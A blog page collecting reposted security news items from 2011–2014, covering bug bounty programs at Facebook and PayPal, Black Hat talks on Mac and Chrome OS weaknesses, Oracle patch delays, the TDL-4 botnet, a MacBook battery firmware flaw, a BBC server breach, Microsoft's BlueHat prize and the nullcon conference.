Showing posts sorted by relevance for query security researchers. Sort by date Show all posts
Showing posts sorted by relevance for query security researchers. Sort by date Show all posts

Facebook Launches Security Bug Bounty

Posted by Avik Sarkar On 7/30/2011 05:01:00 pm


Facebook is set to announce today a bug bounty program in which researchers will be paid for reporting security holes on the popular social-networking Web site.
Compensation, which starts at $500 and has no maximum set, will be paid only to researchers who follow Facebook's Responsible Disclosure Policy and agree not to go public with the vulnerability information until Facebook has fixed the problem.
Facebook Chief Security Officer Joe Sullivan told that "Typically, it's no longer than a day" to fix a bug,

Facebook's Whitehat page for security researchers says: 

"If you give us a reasonable time to respond to your report before making any information public and make a good faith effort to avoid privacy violations, destruction of data, and interruption or degradation of our service during your research, we will not bring any lawsuit against you or ask law enforcement to investigate you."

The compensation program is a good way to provide an incentive and show appreciation to the research community for helping keep Facebook safe for users, according to the company's security team. Up until now, researchers received recognition on the Facebook Whitehat page, maybe some "swag," and--if they were lucky--a job.
"Some of our best engineers have come to work here after pointing out security bugs on our site," like Ryan McGeehan, manager of Facebook's security response team, said Alex Rice, product security lead at Facebook. (Facebook also recently hired famed iPhone jailbreaker and Sony PlayStation 3 hacker George Hotz, who works on security issues.)
Meanwhile, Facebook is allowing security researchers a way to create test accounts on Facebook to ensure they don't violate terms of use or impact other Facebook users, Rice and McGeehan said.
Facebook is following in the steps of Mozilla, which launched its bug bounty program in 2004, and Google, which offers a bug bounty program with payments ranging from $500 to more than $3,000 for finding Web security holes, as well as a program specifically for Chrome bugs.
Microsoft has offered bounties of $250,000 for information leading to the arrest of virus writers, but does not pay researchers who find bugs in its software. However, other companies do, like TippingPoint's Zero Day Initiative.
Researchers typically are paid more for finding bugs in desktop software, which can take much longer to fix and to update software on computers than bugs in Web-based software, which can be fixed much more quickly.

According To FACEBOOK:- 

Eligibility
To qualify for a bounty, you must:
  • Adhere to our Responsible Disclosure Policy:
    ... give us a reasonable time to respond to your report before making any information public and make a good faith effort to avoid privacy violations, destruction of data and interruption or degradation of our service during your research ...
  • Be the first person to responsibly disclose the bug
  • Report a bug that could compromise the integrity or privacy of Facebook user data, such as:
    • Cross-Site Scripting (XSS)
    • Cross-Site Request Forgery (CSRF/XSRF)
    • Remote Code Injection
  • Reside in a country not under any current U.S. Sanctions (e.g., North Korea, Libya, Cuba, etc.)
Our security team will assess each bug to determine if qualifies.

Rewards
  • A typical bounty is $500 USD
  • We may increase the reward for specific bugs
  • Only 1 bounty per security bug will be awarded
Exclusions
The following bugs aren't eligible for a bounty (and we don't recommend testing for these):
  • Security bugs in third-party applications (e.g., http://apps.facebook.com/[app_name])
  • Security bugs in third-party websites that integrate with Facebook
  • Security bugs in Facebook's corporate infrastructure
  • Denial of Service Vulnerabilities
  • Spam or Social Engineering techniques


                                                                                                                                                                     -News Sourec (FACEBOOK & Cnet)


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Apple’s Based Networks are More Vulnerable to Attack than Windows (BH 2011)

Posted by Avik Sarkar On 8/05/2011 10:01:00 pm


For many years, Apple enjoyed security through obscurity. The market share for Mac computers was so small that malware creators bypassed it to go after the much bigger target, Microsoft Windows. Not anymore.
Apple’s market share has been slowly rising and the popularity of the iPhone has put Apple’s products into the spotlight. Hackers are taking notice and they’re figuring out that Apple’s computers have security vulnerabilities, some of them more severe than Windows machines, according to a talk by the iSEC Partners security consulting team at the Black Hat security conference today.
Alex Stamos (pictured), Paul Youn, and B.J. Orvis of iSEC Partners said in their talk that it is possible for hackers to penetrate a network of Apple Mac computers and lurk undetected while gathering data. They concluded that there were so many vulnerabilities on the networking level that Mac machines could be considered more vulnerable than Windows machines.
Apple has not yet responded to a request for comment. At Black Hat, there will also be talks about the vulnerabilities of other operating systems, including Windows. In years past, security researchers have blamed Microsoft for producing vulnerable Windows code. And immediately following the Apple talk, security researchers had another talk about hacking Google’s Chrome operating system.
“This is all changing,” Stamos said. “If [recent hacking events] tell us anything, it’s that any computer is vulnerable to attack.”
The iSEC team said they looked at attacks on the Mac and its latest operating system, code-named Lion, or OS X version 10.7, from the perspective of Advanced Persistent Threats, or long-term security break-ins on networks of computers. They showed examples of the vulnerabilities and detailed proof that they had hacked into the operating system.
The category of Advanced Persistent Threats is a hot one because Google discovered that, under Operation Aurora, dozens of companies were compromised over a long period of time. And McAfee reported today that a similar attacked, dubbed Operation Shady RAT, compromised a total of 72 governments and corporations over a five-year period.
A network of Mac computers can be compromised in the usual way, iSEC’s Stamos said. A single user can be tricked out of giving up a username and password through social engineering or targeted “phishing attacks,” or attacks that use a believable ruse to get you to enter your username and password, which is then captured and compromised by the hackers.
Once inside the network, Stamos said that it is easy for the attacker to escalate the privileges he or she has on the network. That is where Apple’s operating system falls down in comparison to Windows. ”Once you have access, you can compromise the networking,” Orvis said. “Network privilege escalation is where it really gets bad on the Mac.”
The security researchers said that Apple has made improvements to security in version 10.7 of OS X, such as putting applications in a “sandbox,” or isolating them so that they can run (or crash) without taking down the rest of the operating system. Still, the researchers said they had figured out a couple of different ways to compromise the security of Macs through a test program dubbed Bonjoof. They said that it’s possible to lurk on a network and cover your tracks so that intelligence can be gathered on a network over time.
“All of Apple’s major authentication protocols suffer” from some kind of weakness, Orvis said.
There are ways to deal with the vulnerabilities, but company security professionals have to know how to use security forensics technology, which can take a long time. In the meantime, attackers can detect the forensics tools and react to their usage in an attempt to hide. The security researchers said they did talk with Apple about the vulnerabilities they found and communicated a number of ideas about how to improve the security of Apple’s computers.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Critical Security Holes In Oracle Database

Posted by Avik Sarkar On 12/03/2011 04:06:00 pm


A serious vulnerability found by security researchers on oracle databases. An attacker can perform SQL injection attacks and other advanced attacks, thus they can gain full privilege & traction said security researchers. Is Oracle just paying lip service to database security? Some researchers within the database community think so, complaining that as the software juggernaut has grown with acquisitions, such as the blockbuster Sun deal, it hasn't maintained enough resources to securely develop database products and resolve vulnerabilities disclosed by researchers in a timely fashion.
"I would say easy fixes get done pretty quickly, within three to six months, but things that are harder and need some changes in architecture or have an impact on customers where customers have to make some changes to their products, to their software that uses the databases, those things don't get done in the CPU," said Alex Rothacker, manager of Application Security's research arm, TeamSHATTER. "We have a vulnerability disclosed where basically we can brute force any user's password ... we reported this two years ago and they haven't fixed it yet." 

 It's a complaint lodged by many researchers, who say that even as Oracle publicly states it wants to work with the research community to fix database issues, it isn't putting its shoulder into the effort. The numbers show that the proportion of quarterly critical patch updates for Oracle database products has diminished considerably over the last two years.
While some might come to the conclusion that there are fewer updates because Oracle's products are getting more secure, researchers say this trend has occurred simultaneously as the window between disclosure of vulnerabilities and patch releases for them has grown wider.

"They respond immediately and say 'Thank you very much for the information' and so on, but it sometimes takes more than a year to actually release a patch," said Slavik Markovich, VP and CTO of database security for McAfee. "I get the feeling that they don't invest enough or have enough people working on this so it takes a long time to patch." In the meantime, too, new database products--some of them security related, even--are released with the same type of vulnerabilities that researchers have been alerting Oracle to for years.   



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Vasilis Pappas Won 'Blue Hat' Security Contest & Grand Prize of $200,000 From Microsoft

Posted by Avik Sarkar On 7/30/2012 01:52:00 am

Vasilis Pappas Won 'Blue Hat' Security Contest & Grand Prize of $200,000 From Microsoft

Earlier in last year software giant Microsoft started Blue Hat security contest. BlueHat Prize was globally  announced by the company at the 2011 Black Hat security conference in Las Vegas, offers a grand prize of $200,000, a runner-up purse of $50,000, and a third-place award of a one-year subscription to MSDN Universal--a developer's platform for Microsoft products--worth $10,000--to security researchers who design the most effective ways to prevent the use of memory safety vulnerabilities. 
This year Microsoft awarded a bunch of hackers and gave away an amount of  $260,000. 'Hackers' in the good sense here, the clever programmers who won its Blue Hat security contest, including a grand prize of $200,000

The big prize was awarded to a PhD student at Columbia University, Vasilis Pappas, who was handed the check in an American Idol-style contest finale complete with loud music and confetti. The winners were announced during a party at the Black Hat hackers conference 2012 that just happened this week in Las Vegas. Two other guys took home significant prizes, too. Ivan Fratric, a researcher at the University of Zagreb in Croatia, got $50,000 and Jared DeMott, a Security Researcher for Harris Corp. won $10,000.
They all submitted ideas to help solve a really hard security problem called Return-Oriented Programming. ROP is a hacker technique that is often used to disable or circumvent a program's computer security controls. Twenty people submitted ideas in the contest. Without getting into too much technical detail, Pappas came up with something called kBouncer which blocks anything that looks like an ROP attack from running. It's become popular these days to pay security researchers bounties. But what's cool about the Blue Hat contest is that it paid the researcher for actually coming up with a fix to a problem. Not only Microsoft, other compaines- GoogleFacebook, Paypal & many more already have their "Bug Bounty" program, where they reward researchers for simply identifying flaws in thier system. But by contrast Microsoft and Adobe don't pay bounties. Here Microsoft promised that this first Blue Hat prize won't be its last, So this may be a sign of a smart new approach to engaging with security researchers for the software giant. 


-Source (Microsoft & Business Insider)







SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Microsoft Started "BlueHat" Contest for Better Security

Posted by Avik Sarkar On 8/05/2011 05:09:00 am


As any Jedi knight knows, the temptation to turn to the Dark Side is difficult to resist. The same can be true for White Hat hackers--malware fighters who discover vulnerabilities in software.
The black market prices for those kinds of security flaws are as tantalizing to ethical hackers as the malevolent side of The Force was to Luke Skywalker. Microsoft wants to temper those temptations, though, and has announced a contest that offers more than $250,000 in prizes for developing better solutions to counter security threats.
Microsoft's "BlueHat Prize," announced by the company at the Black Hat security conference in Las Vegas Wednesday, offers a grand prize of $200,000, a runner-up purse of $50,000, and a third-place award of a one-year subscription to MSDN Universal--a developer's platform for Microsoft products--worth $10,000--to security researchers who design the most effective ways to prevent the use of memory safety vulnerabilities. Those kinds of vulnerabilities can create problems like buffer overflows that can be exploited by Net miscreants to compromise computers.
“As the risk of criminal attacks on private and government computer systems continues to increase, Microsoft recognizes the need to stimulate research in the area of defensive computer security technology," Matt Thomlinson, Microsoft’s General Manager of Trustworthy Computing Group, said.
“Our interest is to promote a focus on developing innovative solutions rather than discovering individual issues," Thomlinson continued. "We believe the BlueHat Prize can catalyze defensive efforts to help mitigate entire classes of attacks."

Top Experts Needed:-

In offering the prize, Microsoft hopes to attract the world's top experts to focus their "little gray cells" on a major security problem. “Microsoft wants to encourage more security experts to think about ways to reduce threats to computing devices," observed Katie Moussouris, senior security strategist lead for the Microsoft Security Response Center.
“We’re looking to collaborate with others to build solutions to tough industry problems," she added. "We believe the BlueHat Prize will encourage the world’s most talented researchers and academics to tackle key security challenges and offer them a chance to impact the world."

The Origin of the Concept:-

According to Microsoft, it got the idea for the BlueHat prize from a previously launched security information-sharing program. That initiative, the Microsoft Active Protections Program (MAPP), allows Microsoft to share information with security vendors around the world so they can release protection technologies to their customers much faster. The success of that program got Microsoft thinking about mounting a similar effort for the security research community.
One vendor with praise for BlueHat was Adobe, a company that's no stranger to software with vulnerabilities. “The Microsoft BlueHat Prize announced at Black Hat [on August 3] is an exciting new initiative and a great example of encouraging community collaboration in the defense against those with malicious intent," observed Adobe's Senior Director for Product Security and Privacy Brad Arkin.
“This call for entries promises to stimulate research activity within the broader security community on how to mitigate entire classes of attacks, rather than thinking about software security as a challenge best addressed one bug at a time," he continued. "This research has the potential to lower costs for third-party developers and increase the level of security assurance for end users."
Here are the official rules and guidelines for the competition. Contest submissions will be accepted until Sunday, April 1, 2012, Microsoft said. A panel of Microsoft security engineers will judge submissions based on the following criteria: Practicality and functionality (30 percent); robustness--how easy it would be to bypass the proposed solution (30 percent); and impact (40 percent). The winners will be announced at Black Hat USA conference in 2012.

-News Source (PC World)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

PayPal Announced Paid “Bug Bounty” Program for Security Researchers

Posted by Avik Sarkar On 6/24/2012 09:07:00 pm

PayPal Announced  Paid “Bug Bounty” Program for Security Researchers

Giant in payment services provider PayPal recently announced the launch of a new paid bug bounty program where PayPal will reward security researchers who will discover vulnerabilities in its website with handsome amount of money. In the official blog PayPal's Chief Information Security Officer Michael Barrett said- "The security of our customers’ data is our number one priority" Its very obvious and clear that while enhancing more security PayPal took this step because we all know that PayPal is listed among those sites where cyber-criminals always kept their eyes. 
If you are a security researcher, and you've discovered a site or product vulnerability, please forward your details to sitesecurity@paypal.com. We also like to give you reminder that before PayPal- Facebook, Google & many other has already started this paid bug bounty program.

-:PayPal Bug Bounty Program In Details:-
  • PayPal security team will determine the bounty amount and all decisions are final. 
  • Bounty is awarded to the first person that discovers the previously unknown bug.
  • The bug bounty program is subject to change or to cancellation at any point without notice.
  • Payment is paid out through a verified PayPal account, once the bug is fixed.
  • For all submissions, do not send personal information in your report and please use PayPal's PGP key to encrypt your email.
  • Individuals from sanctioned countries are not allowed to participate in this program.
  • eBay Inc. employees, contractors and their immediate relatives are not allowed to participate in the program.
Vulnerabilities That Are in Scope:
  • XSS
  • CSRF/XSRF
  • SQLi
  • Authentication bypass
Note: While "Logout CSRF" is a well-acknowledged issue, there are other techniques  like "cookie forcing" and "cookie bombardment" that can make it futile to defend against this attack. Also, PayPal's web sessions are relatively short lived and hence the Bug Bounty panel will not consider reports of the ability to log out users from PayPal as qualifying for the reward.
In Your Bug Submission Email, Please Include The Following:
  • Your email address
  • Your PayPal account (in order to receive the bounty)
  • Vulnerability type (i.e., XSS, CSRF, SQLi, etc.)
  • Vulnerability Scope: Domain(s), URL(s) and Parameter(s) impacted
  • Steps to reproduce bug
Guidelines for Responsible Disclosure
  • Share the security issue with us before making it public on message boards, mailing lists, and other forums.
  • Allow us reasonable time to respond to the issue before disclosing it publicly.
  • Provide full details of the security issue.
Terms for Participation :- As between eBay Inc. and the Submitter, as a condition of participation in the PayPal Bug Bounty program, the Submitter grants eBay Inc., its affiliates and customers a perpetual, irrevocable, worldwide, royalty-free and non-exclusive license to use, reproduce, adapt, modify, publish, distribute, publicly perform, create derivative work from, make, use, sell, offer for sale and import the Submission for any purpose. Submitter represents and warrants that the Submission is original to the Submitter and Submitter owns all rights, title and interest in and to the Submission. Submitter waives all other claims of any nature, including express contract, implied-in-fact contract, or quasi-contract, arising out of any disclosure of the Submission to eBay. In no event shall eBay be precluded from discussing, reviewing, developing for itself, having developed, or developing for third parties, materials which are competitive with those set forth in the Submission irrespective of their similarity to the information in the Proposal, so long as eBay complies with the terms of participation stated herein. 

For additional information click Here





SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Google Chrome OS Has Security Hole (Black Hat 2011)

Posted by Avik Sarkar On 8/05/2011 07:20:00 pm


Black Hat Google has billed its Chrome operating system as a security breakthrough that's largely immune to the threats that have plagued traditional computers for decades. With almost nothing stored on its hard drive and no native applications, there's no sensitive data that can pilfered and it can't be commandeered when attackers exploit common software vulnerabilities.
But according to two researchers who spent the past few months analyzing the Chrome-powered Cr-48 beta released in December, the browser-based OS is vulnerable to many of the same serious attacks that afflict people surfing websites. As a result, users remain susceptible to exploits that can intercept email, documents, and passwords stored on centralized servers, many of which are maintained by Google.
“Even though they put these awesome security protections in place, we're just moving the security problems to the cloud now,” Matt Johansen, a researcher with WhiteHat Security, told The Register. “We're moving the software security problem that we've been dealing with forever to the cloud. They're doing a lot of things right, but it's not the end all and be all for security.”
Virtually all of the threats identified by Johansen and his WhiteHat colleague Kyle Osborn stem from Chrome's reliance on extensions, which are essentially web-based applications. A fair number of the extensions they analyzed contain XSS, or cross-site scripting, bugs, which have the potential to inject malicious code and content into a visitor's browser and in some cases steal credentials used to authenticate user accounts.
As they went about testing what kind of attacks various XSS vulnerabilities could allow, Johansen and Osborn noticed something curious: a bug in one extension often allowed them to hijack the communications of a second extension, even when the latter one had no identifiable security flaws. At the Black Hat security conference in Las Vegas on Wednesday, they demonstrated this weakness by exploiting an XSS hole in one extension to steal passwords from an otherwise secure account on cloud password storage service LastPass.
“If any of the other vulnerable extensions have an XSS hole, we can utilize JavaScript to hijack that communication,” Johansen said. “LastPass is doing absolutely nothing wrong here. You can have an extension that's perfectly fine, but if you have another that has a cross-site scripting error in it we can still access information in secure applications.”
The discovery has generated a quandary for the researchers.
“Whose problem is this to fix?” Johansen continued. “We don't really have an answer for that. LastPass did everything correctly. It's the other extension developers that developed an extension with a vulnerability in it.”
After being informed of the specific attack, LastPass made changes to its Chrome extension that prevented it from being carried out, so it's reasonable to assume extension makers foot some of the responsibility for preventing their apps from being compromised by others. But Johansen couldn't rule out the possibility that vulnerabilities and other apps could probably make LastPass vulnerable again. He said Google might be able to fix the problem by overhauling the application programming interfaces extension developers use.
The researchers also demonstrated an XSS vulnerability in Scratchpad, a text-editor extension that's bundled with Chrome. By sharing files with names containing JavaScript commands stored on Google Docs they were able to obtain the Google session cookies of anyone who used a Chromebook to view the documents. An attacker could exploit the vulnerability to read a victim's email, or to send instant messages to everyone on the victim's contact list. If any of the contacts are using Chromebooks, they could be similarly vulnerable to booby-trapped filenames stored on Google Docs.
A Google spokeswoman defended the security of Chromebooks and said the vulnerabilities enumerated by the researchers weren't unique to the cloud-based OS. In an email, she issued the following statement:
This conversation is about the web, not Chrome OS. Chromebooks raise security protections on computing hardware to new levels. They are also better equipped to handle the web attacks that can affect browsers on any computing device, thanks in part to a carefully designed extensions model and the advanced security available through Chrome that many users and experts have embraced.
The researchers stressed Google engineers were extremely quick to fix the Scratchpad vulnerability and awarded them a $1,000 bounty for their report. But they remain convinced that the security of Chrome OS in many cases is only as strong as its' weakest extensions. They also pointed out that penetration-testing tools such as the Browser Exploitation Framework could be used to help streamline attacks in much the way Metasploit is used to manage exploits for traditional machines.
And, Johansen said, Chrome hacking through XSS may be only the beginning, since the flaws are among the easiest to find and exploit.
“Who knows what we're going to be looking for months or years from now when Google can figure out a way to thwart the cross-site scripting threat,” he said. “Why would we be trying to write buffer overflows when we can just write a simple JavaScript command.” 
-News Source (The Register)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

BBC Server Compromised! Russian Hackers Broke Into FTP & Tried to Sell Unauthorized Access

Posted by Avik Sarkar On 1/02/2014 11:09:00 pm

BBC Server Compromised! Russian Hackers Hacked Into FTP & Tried to Sell Unauthorized Access on The X-Mass Evening 
Earlier we have seen world renowned media houses like CNN, NBC, Fox News, Washington Post, NY Times, NDTV and so on have fallen victim to hackers and cyber criminals. Now it was the turn for world’s largest and oldest broadcaster -British Broadcasting Corporation, widely known to us as BBC. Sources revealed that cyber criminals have managed to breach the security system of BBC and secretly took over a computer server at the BBC and then launched a Christmas Day campaign to convince other cyber criminals to pay him for access to the system. The attack was first identified by a cyber security firm named Hold Security LLC, in Milwaukee that monitors underground cyber crime forums in search of stolen information. However, it is still not clear whether the hacker stole any information or data or caused any damage to the site. In conversation with press Alex Holden, founder and Chief Information Security Officer of Hold Security told -"So far Hold Security researchers have found no evidence the conversations led to a deal or that data was stolen from the BBC.” So far the identity of hacker has not been confirmed, but the firm researchers observed a notorious Russian hacker known by the monikers "HASH" and "Rev0lver," attempting to sell access to the BBC server on December 25. However, BBC's security team managed to secure the site on Saturday, claims a person close to clean up efforts. One of the BBC spokesman refused to comment on the issue, he said, “We do not comment on security issues.” On the other hand, Justin Clarke, a principal consultant for the cyber security firm Cylance, said that while "accessing that server establishes a foothold within BBC's network which may allow an attacker to pivot and gain further access to internal BBC resources.” So far Hold Security researchers have found no evidence the conversations led to a deal or that data was stolen from the BBC. But we all know that  ftp systems are typically used to manage the transfer of large data files over the Internet. That's why the chances of data breach cant not be denied at this time. For updates on this piece of news and other hot information of the cyber & tech world stay tuned with VOGH


SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

TDL is Targeting Windows PC, Experts are saying that "it is almost indestructible"

Posted by Avik Sarkar On 7/05/2011 10:05:00 pm


More than four million PCs have been enrolled in a botnet security experts say is almost "indestructible". The botnet, known as TDL, targets Windows PCs and is difficult to detect and shut down. targeting
Code that hijacks a PC hides in places security software rarely looks and the botnet is controlled using custom-made encryption.
Security researchers said recent botnet shutdowns had made TDL's controllers harden it against investigation.
The 4.5 million PCs have become victims over the last three months following the appearance of the fourth version of the TDL virus. The changes introduced in TDL-4 made it the "most sophisticated threat today," wrote Kaspersky Labs security researchers Sergey Golovanov and Igor Soumenkov in a detailed analysis of the virus. "The owners of TDL are essentially trying to create an 'indestructible' botnet that is protected against attacks, competitors, and anti-virus companies," wrote the researchers.
Recent successes by security companies and law enforcement against botnets have led to spam levels dropping to about 75% of all e-mail sent, shows analysis by Symantec.
A botnet is a network of computers that have been infected by a virus that allows a hi-tech criminal to use them remotely. Often botnet controllers steal data from victims' PCs or use the machines to send out spam or carry out other attacks.
The TDL virus spreads via booby-trapped websites and infects a machine by exploiting unpatched vulnerabilities. The virus has been found lurking on sites offering porn and pirated movies as well as those that let people store video and image files. The virus installs itself in a system file known as the master boot record. This holds the list of instructions to get a computer started and is a good place to hide because it is rarely scanned by standard anti-virus programs.
The biggest proportion of victims, 28%, are in the US but significant numbers are in India (7%) and the UK (5%). Smaller numbers, 3%, are found in France, Germany and Canada.
However, wrote the researchers, it is the way the botnet operates that makes it so hard to tackle and shut down.
The makers of TDL-4 have cooked up their own encryption system to protect communication between those controlling the botnet. This makes it hard to do any significant analysis of traffic between hijacked PCs and the botnet's controllers.
In addition, TDL-4 sends out instructions to infected machines using a public peer-to-peer network rather than centralised command systems. This foils analysis because it removes the need for command servers that regularly communicate with infected machines.
"For all intents and purposes, [TDL-4] is very tough to remove," said Joe Stewart, director of malware research at Dell SecureWorks to Computerworld. "It's definitely one of the most sophisticated botnets out there."
However, the sophistication of TDL-4 might aid in its downfall, said the Kaspersky researchers who found bugs in the complex code. This let them pry on databases logging how many infections TDL-4 had racked up and was aiding their investigation into its creators.

-News Source (BBC)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Vulnerability in Apple MacBooks Which Could ruin Batteries

Posted by Avik Sarkar On 7/24/2011 02:54:00 pm


One prominent security researcher has discovered a vulnerability in the batteries of Apple's MacBook line of portable computers that could allow hackers to ruin the batteries or install malware on them that could corrupt a Mac.
Charlie Miller, a renowned white-hat hacker who works for security firm Accuvant, plans to reveal and offer a fix next month for a MacBook battery vulnerability he has discovered, Forbes reports. Miller uncovered default passwords, which are used to access the microcontroller in Apple's batteries, within a firmware update from 2009 and used them to gain access to the firmware.

Apple and other laptop makers use embedded chips in their lithium ion laptop batteries to monitor its power level, stop and start charging and regulate heat.
During the course of his tests, the researcher "bricked" seven batteries, rendering them unusable by rewriting the firmware. Of more concern is the possibility that hackers could use the vulnerability to install difficult to remove malware, or, in a worst case scenario, cause the batteries to explode.

“These batteries just aren’t designed with the idea that people will mess with them,” he said. “What I’m showing is that it’s possible to use them to do something really bad.” According to him, IT few administrators would think to check the battery, providing hackers with an opportunity to hide malicious software on a battery that could repeatedly implant itself on a computer.

Miller admitted that he hasn't tried to blow up any batteries, but he did say it might be possible. "You read stories about batteries in electronic devices that blow up without any interference,” he noted. “If you have all this control, you can probably do it.”
another researcher, Barnaby Jack, who works for antivirus software maker McAfee, also looked into the battery issue a couple years ago, but said he didn't get as far as Miller did.

Miller, who is a regular winner of security contests demonstrating Mac, Safari and iPhone exploits, has notified Apple and Texas Instruments of the issue. Despite requests from several other researchers not to proceed, he plans to unveil the vulnerability, along with a fix he calls "Caulkgun," at the Black Hat security conference next month.
"Caulk Gun" will change a battery's default passwords to a random string of characters. While the fix will prevent hackers from breaking into the battery, it would also block any future firmware updates from Apple.

In spite of the battery vulnerability that he uncovered, Miller believes Mac OS X security is better than ever before. According to him, Apple engineers made few security-related changes in the jump from Leopard to Snow Leopard, but they made substantial improvements in Mac OS X 10.7 Lion, which was released on Wednesday.
"Now, they've made significant changes and it's going to be harder to exploit,” he said, as noted by The Register.
“It's a significant improvement, and the best way that I've described the level of security in Lion is that it's Windows 7, plus, plus,” said noted security consultant Dino Dai Zovi.
Apple offered security researchers, including Miller and Dai Zovi, an unprecedented early look at Lion in order to get their feedback.
According to researchers, Lion's biggest security improvement is Lion's support for Address Space Layout Randomization. ASLR randomizes the location of critical system components to reduce the risk of attack. Apple also added sandboxing security measures in Safari that will isolate potential bugs or malware. Finally, the newly revamped File Vault now allows an entire drive to be encrypted.


-News Source (Appleinsider)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Oracle to Mitigate 73 Security Vulnerabilities in Upcoming Critical Patch Update

Posted by Avik Sarkar On 4/28/2011 10:18:00 pm


Oracle is all set for the upcoming critical patch update. The pre-release announcement by the company indicates that in all 73 vulnerabilities associated with numerous products will be mitigated during the next critical patch update. The update will mitigate security vulnerabilities associated with Oracle database server, fusion middleware, enterprise manager, e-business suite, supply chain products, PeopleSoft, JD Edwards suite, Siebel CRM, industry applications, Sun products and Open office suite.

The company releases quarterly critical patch updates on Tuesday closest to 17th day of January, April, July and October. The company uses Common Vulnerability Scoring System (CVSS) version 2.0 to rate vulnerabilities. The vulnerabilities are assigned scores based on the prerequisites for exploiting the vulnerability, ease of exploit, and impact of the attack on availability, confidentiality and integrity. Base scores range from 0.0 to 10.0 with ten being the most severe vulnerability.

Vulnerabilities may be caused by technological flaws, programming errors, and other human errors. Developers are required constantly upgrade their technical skills through online IT degree courses, training programs and refresher courses to deal with ever evolving threats.

The critical patch update will address six vulnerabilities in database server. The vulnerabilities affect components such as application service level management, database vault, Oracle help, security service, warehouse builder, UIX and network foundation. Two of the six vulnerabilities do not require authentication for exploitation of vulnerabilities. Highest base score for security flaws affecting database server is 6.5. The update will mitigate 9 flaws associated with fusion middleware, 6 of which are exploitable without authentication.

The vulnerabilities affect Oracle help, HTTP server, JRockit, outside In technology, security service, WebLogic server, portal and single sign on. Oracle has assigned highest severity score of 10 for vulnerabilities affecting fusion middleware. 4 vulnerabilities will be fixed in Oracle applications, 2 of which are exploitable without authentication. The vulnerabilities have been assigned a base score of 4.3 and affect application object library, applications install, and web ADI. The update will resolve a flaw in Supply chain products suite, which is exploitable without authentication. Highest base score for vulnerability in supply chain products suite is 4.3 and affects Agile technology program.

14 security flaws have related to PeopleSoft Suite will be fixed in the upcoming critical patch, 1 of which is exploitable without authentication. Highest base score for security flaws associated with PeopleSoft suite is 4.3 and affects PeopleSoft Enterprise, Enterprise CRM, ELS, HRMS and People tools. The critical patch update will resolve 8 issues associated with JD Edwards suite, 7 of which are exploitable without authentication. Highest base score for vulnerabilities in JD Edwards suite is 6.4 and affects EnterpriseOne tools.

The update will address a vulnerability associated with industry applications, which affects InForm. Highest base score for vulnerability in industry applications is 5.5. 8 security flaws will be mitigated in Sun products suite, seven of which are exploitable without authentication. Oracle has assigned highest severity score of 10 for security flaws affecting Sun products suite. The components affected include Java Dynamic Management Kit, Java system web server, Solaris, OpenSSO Enterprise, GlassFish Enterprise server, java system application server, java system access manager policy agent, and java system messaging server.

The upcoming critical patch update will fix 8 security issues related to Open Office suite, of which 7 are exploitable without authentication. Highest base score for security flaws in Open Office suite is 9.3. Open Office, StarOffice and StarSuite are affected by the vulnerabilities.

Vulnerabilities are identified by professionals qualified in IT degree programs and security certifications such as penetration testing. Developers encourage both in-house and independent security researchers to detect and report security flaws so that they can be mitigated before exploitation by attackers.

Online IT courses, e-tutorials, security blogs and alerts from computer emergency response teams could help users in gaining insights on security threats, their implications and importance of security updates. Users must keep track of the security releases and install necessary updates to safeguard their systems and data from unauthorized access. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Nullcon - International Security Conference [Goa 2012]

Posted by Avik Sarkar On 1/06/2012 05:31:00 pm



null - The open security community is a registered non-profit society and by far the largest security community in India with more than 2000 members comprising of information security professionals, ethical hackers and law enforcement professionals that focuses on infosec research and assisting Govt. and private organizations with cyber security issues. null has 7 chapters through out India - Pune, Bangalore, Mumbai, Hyderabad, Delhi, Chennai and Bhopal, interacting with around 5000-6000 people by various activities like monthly meets, security camps, workshops, talks at various events & organizations and executing security projects. 

nullcon portal http://null.co.in provides free information on security research, responsible vulnerability disclosure, open source security software project, white papers, presentations, monthly chapter meets.

We see that currently there is a disconnect between the Govt. agencies and private organizations when it comes to cyber security and aim to fill the gap in a vendor neutral way. We have many projects running that help organizations tighten their security infrastructure, including Keeda Project and nullcon - International Security Conference and Trainings.

Keeda Project is a database of vulnerabilities found in the wild which are reported to us by the members or anonymous researchers and we take action by immediately contacting the concerned organization and the respective CERT with information on the vulnerability and assist them in mitigating the threats.
As a part of null initiatives we organize nullcon - International Security Conference (http://nullcon.net), our annual flag-ship event. It is held in Goa in the month of February. At nullcon we call upon security experts from around the world to deliver talks and workshops on the latest technology and techniques in the security and hacking world. The talks range from web hacking, security & hacking tools, smart phone hacking, cyber warfare to zero day vulnerabilities.

The year 2012 marks a revolutionary change and unprecedented expansion in the way nullcon is organized. With the overwhelming support of our esteemed sponsors, enthusiastic participants and volunteers - null is organizing TWO conferences in 2012   
- nullcon Goa on 15-18th Feb 2012 and nullcon Delhi in Oct 2012
nullcon Goa continues to be a mix of hacking, security and business briefings with a lot of technical events for all the security geeks.
nullcon Delhi will focus more on the Corporate and the Government sector. It will include events geared towards business prospects in information security such as the exquisite Exhibit Space and Demo Zone for cutting-edge technology and products, business networking events and parties.



SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-

Exclusive Threat Report on Mobile Security Breach By IBM X-FORCE TEAM

Posted by Avik Sarkar On 9/30/2011 02:07:00 pm

The number of mobile security exploits is on track to double year over year between 2010 and 2011. “For years, observers have been wondering when malware would become a real problem for the latest generation of mobile devices,” said Tom Cross, a manager at IBM’s X-Force security research arm. “It appears that the wait is over.”
X-Force security experts research and evaluate vulnerabilities and security issues, develop assessment and countermeasure technology and educate the public about emerging web and mobile threats. In a new report on mobile and general Internet security, X-Force researchers found that the combination of new vulnerabilities and more sophisticated phone-hacking technology has led to a huge spike in the number of security exploits on mobile phones.
